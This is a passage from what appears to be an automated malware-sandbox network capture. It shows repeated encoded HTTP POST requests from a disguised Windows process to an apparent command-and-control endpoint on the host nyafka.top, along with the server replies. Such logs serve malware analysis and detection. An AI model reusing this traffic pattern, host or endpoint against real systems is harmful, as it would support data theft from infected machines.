                                                                Data Ascii: PXXXT\XW^ZUXQPZXWXX_UPQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<./?*<&;+C<60(57B($-)U*,C5"'(+#Y$/\*5
                                                                Oct 11, 2024 01:37:12.031829119 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dEr%2FWRzspvhur5271Opj1zoes3Yv2aVsE85K%2FBZw2JJ%2F%2FoXX9SSBeepD5%2FTiKi0rrZHr4fFQ%2B6awz80yirATYyEwgFb4pReFdf5pKMdbsq0r0iFTxys2ZrPNaGVNBoCVnvP5Yfxp"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fd7fce4de9a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 3e 5f 3e 55 20 2d 20 02 3b 08 30 12 3e 2d 03 04 28 32 24 06 25 1a 3c 07 39 3c 0f 1f 21 38 2f 05 3e 5a 31 01 24 3c 2b 5d 2b 1b 2a 51 03 1b 3a 01 2b 23 2b 1e 3c 0b 29 19 28 32 26 01 30 0a 3a 19 29 03 0c 0e 24 10 32 15 22 08 28 1f 3e 02 23 55 2c 15 2b 42 28 38 29 05 23 2b 2a 5f 08 13 3a 0f 3d 38 2b 0f 21 09 00 05 36 03 37 1e 36 00 29 0b 3e 5f 22 1c 30 0a 38 59 2d 21 27 07 23 11 27 56 22 3f 35 0f 37 5b 2c 1e 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>_>U - ;0>-(2$%<9<!8/>Z1$<+]+*Q:+#+<)(2&0:)$2"(>#U,+B(8)#+*_:=8+!676)>_"08Y-!'#'V"?57[,2("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.550045188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:08.713814020 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:09.066454887 CEST1984OUTData Raw: 50 5e 5d 5f 51 5b 58 50 5e 5a 55 58 51 57 5a 59 57 5f 58 59 55 5d 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]_Q[XP^ZUXQWZYW_XYU]Q]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<=+?:,&X$E<C0Y";<#)T#$;P&.%T*8,!" =#Y$/\*)
                                                                Oct 11, 2024 01:37:09.197117090 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:09.364727020 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:09 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EJOqdgboQjpLmhlKRCcO5N4CQ83ZQAL3g6pj2IC1gtVBzS%2BLkEW1fibDT69nsFzhBtS3nYi%2F%2BYv6ZZpOFkrQkCJn8hDvlcXMWDEK6pPdSziU5KNwgB2aoaurKEOvGPJ%2FKVTm8AZ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fc82c2978e2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 3e 07 3d 0d 37 2d 34 03 2f 31 33 00 3e 3e 26 15 3c 31 33 5a 26 37 3f 58 39 05 3e 0e 35 15 3c 5d 3e 5a 29 06 24 5a 30 00 3c 21 2a 51 03 1b 39 13 3f 33 34 0f 3f 32 22 07 2b 22 04 07 33 0d 17 06 3d 03 2e 0f 25 3e 00 5c 22 31 0e 1f 3d 3c 27 54 2c 15 24 1b 28 2b 2e 10 34 01 2a 5f 08 13 39 56 28 28 3b 0e 35 37 0f 14 35 5b 3f 57 36 07 2a 56 3d 2a 3a 55 25 30 23 01 3b 32 01 03 34 3c 3f 54 23 3c 00 10 20 3d 34 5c 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^>=7-4/13>>&<13Z&7?X9>5<]>Z)$Z0<!*Q9?34?2"+"3=.%>\"1=<'T,$(+.4*_9V((;575[?W6*V=*:U%0#;24<?T#< =4\%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.550046188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:09.520844936 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:09.878808975 CEST2584OUTData Raw: 50 59 5d 55 54 59 58 57 5e 5a 55 58 51 50 5a 52 57 5b 58 5a 55 54 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PY]UTYXW^ZUXQPZRW[XZUTQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9)-?$'.(D?57#+'](5S44'=);8@ 1'=+#Y$/\*5
                                                                Oct 11, 2024 01:37:09.973994017 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:10.235568047 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6aUrIYm3dyuzJtTPfYtXh1xf0bmLfqgPc8vd592KRx5pKm1LqLgtF%2Fs48frTeBZYX1wrrI8SWLC48guBdDwMTZOiQ8OuFUkBOl2GsvFCPpRD4YwFPU9PJ%2BZtajHs3Qc8YDmXNJe"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fcd0b12c334-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.550047188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:10.470511913 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:10.816163063 CEST2584OUTData Raw: 55 5d 5d 55 51 5b 58 5e 5e 5a 55 58 51 52 5a 5c 57 58 58 5b 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]UQ[X^^ZUXQRZ\WXX[UPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9([,?$'-,(3"0?:!' 3"*8(!<*#Y$/\*
                                                                Oct 11, 2024 01:37:10.928615093 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:11.178443909 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mS6ko9v3lE8RVaGV%2FHNT778f4KA5rbfsRO8XPjraDuwhK%2BdmXKTtI7CxLX8y6WiUNiGb6BbUJiYf0XIDcBljl56KQb0anwmvo3BTGxnl3AnOz6oBJH4Y6pHp%2BgEDCdG2QwIRt2TD"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fd30f361a13-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.550048188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:11.300683975 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:11.660043001 CEST2584OUTData Raw: 50 53 58 5a 51 5b 5d 53 5e 5a 55 58 51 50 5a 58 57 59 58 58 55 55 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PSXZQ[]S^ZUXQPZXWYXXUUQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(?+U'>(B+%45;+#.4$('-*>!1(*#Y$/\*5
                                                                Oct 11, 2024 01:37:11.765763998 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:12.027594090 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:11 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9euGPxtEo%2FAw2TDgNefcMMXz%2BLeeDCi7i9P%2BLCeu2pV8ZL8j23pgfkXtFgMOQ2Xkyt2agcdabRGgaHcC3eILpXH9p5U77YKnboM%2FvrWOStjv4M%2Bt9DDN%2FbK6QxHhkXHzWucf85gY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fd83f3018bc-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.550049188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:12.147686958 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:12.503669024 CEST2584OUTData Raw: 55 5d 5d 59 54 5e 5d 51 5e 5a 55 58 51 56 5a 59 57 5b 58 55 55 55 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]YT^]Q^ZUXQVZYW[XUUUQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]+'?818(5^5;++ !U44?V'1=8$A!(+#Y$/\*-
                                                                Oct 11, 2024 01:37:12.601473093 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:12.780406952 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jqPysGSWJKnHQ1myeWXX7Or6bhAkjQ5HhdIFtKa3SYwhGeHEDBTtSe4ZfBtbXzWf7c2Us4dnc2skyxxe64t0tq5jWF6Rf%2FawZ7myISBFO29fM%2F8OpVcjGYQdhyu2E72r44vrhvs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fdd7e5e8cbf-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.550050188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:12.150121927 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:12.503777027 CEST2004OUTData Raw: 50 5a 5d 5f 51 58 58 51 5e 5a 55 58 51 57 5a 5e 57 5a 58 5e 55 51 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZ]_QXXQ^ZUXQWZ^WZX^UQQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]<>:'V&8E++") "7 $*8,@!2'*#Y$/\*)
                                                                Oct 11, 2024 01:37:12.605436087 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:12.775216103 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:12 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoqIihq61kmuqapHxe1g8e2CvOzxba1tb8FsiUJNwPb9vHtVJkUIeZDorZcYxx%2B5ZEXXKZVZQ2SD5m%2BgCepHtR0VaDuwLsTrEYC4GCQbcUECkJavo4TpUWrgRRiaZUXnNEZHljus"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fdd7c0d41af-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 28 2a 21 0c 37 2e 0e 02 3b 1f 3f 00 2b 3d 2a 5c 2b 21 06 03 31 24 38 01 2e 12 00 0e 22 15 27 00 3d 2c 26 5e 33 3c 24 00 29 31 2a 51 03 1b 3a 06 3c 1d 37 1e 3f 0c 0b 5e 29 31 3e 07 33 0d 36 1c 29 04 31 56 25 2e 3e 15 36 0f 38 57 28 2c 2f 1e 38 3b 01 43 3d 3b 3e 5d 37 3b 2a 5f 08 13 39 13 3d 06 0a 51 35 09 21 58 23 3e 38 0f 35 29 2e 56 3d 17 25 09 30 0d 24 5e 2c 32 3b 07 23 2c 3f 1e 21 5a 32 57 37 13 2b 00 31 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$(*!7.;?+=*\+!1$8."'=,&^3<$)1*Q:<7?^)1>36)1V%.>68W(,/8;C=;>]7;*_9=Q5!X#>85).V=%0$^,2;#,?!Z2W7+1"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.550051188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:12.910264015 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:13.269243002 CEST2004OUTData Raw: 50 53 5d 5d 54 5f 58 57 5e 5a 55 58 51 52 5a 5b 57 5f 58 55 55 54 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]]T_XW^ZUXQRZ[W_XUUTQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<-<]>);2=8@+3!;Z? #$9>;?62;*#Y$/\*
                                                                Oct 11, 2024 01:37:13.382528067 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:13.788630962 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O276h0ZSCcuxo4o1SYkwjTt390EIuy8fWNuuGbHTaSoQ%2FG0GGHxTfzxJKGYt%2BvBO8S6CHSndCko9XWjMcjG%2FbRGvPRPFaeZQpwGNuJH1O4NK2MEqr%2FjmCXJXJNPX0bT5ufza9Rak"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fe24b278cb1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 3d 07 26 52 23 2d 20 00 3b 1f 24 1d 3d 13 25 00 3f 57 2c 00 24 34 20 04 39 05 29 1f 21 05 0d 04 3d 3c 22 59 27 2c 2f 5c 2b 0b 2a 51 03 1b 3a 01 3e 30 37 54 28 22 35 14 28 22 0c 07 24 1d 13 45 29 2d 21 57 25 2d 3a 16 22 57 3c 1e 3d 2f 23 57 2c 02 33 08 28 28 07 03 20 2b 2a 5f 08 13 3a 0d 3d 2b 20 1e 20 24 39 1a 35 13 27 1d 36 3a 36 51 3f 39 07 09 24 0d 0d 06 38 0c 0a 59 23 01 37 1e 22 2f 22 52 37 03 3c 59 25 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^=&R#- ;$=%?W,$4 9)!=<"Y',/\+*Q:>07T("5("$E)-!W%-:"W<=/#W,3(( +*_:=+ $95'6:6Q?9$8Y#7"/"R7<Y%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                71192.168.2.550052188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:12.978437901 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:13.331912041 CEST2584OUTData Raw: 50 5e 5d 5d 54 58 5d 56 5e 5a 55 58 51 50 5a 5c 57 59 58 54 55 52 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]]TX]V^ZUXQPZ\WYXTURQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-0\?:#U%>#<C06+#(357/V&."* 1)+#Y$/\*5
                                                                Oct 11, 2024 01:37:13.422671080 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:13.788744926 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:13 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQoMLuxIKElUcdtdEm4DbONJR7997aIAJWTMTwtXD9Bs8hRHsO5RO0HNseTY%2BbX28X43uENMh2B3Hb70a4bcb2vp5MlbmMfQ6JxRPUM5U%2BGTK%2FEJzMTeVOHhn8LY435gB2v9OnxY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fe299af43b1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:13.894743919 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.550053188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:13.912460089 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:14.269705057 CEST2584OUTData Raw: 55 5d 5d 5b 54 5b 58 52 5e 5a 55 58 51 54 5a 59 57 59 58 5d 55 50 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]][T[XR^ZUXQTZYWYX]UPQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?[3('2>,<&(5]3(! ;S'=1T=?!(>;#Y$/\*%
                                                                Oct 11, 2024 01:37:14.365849018 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:14.627578020 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
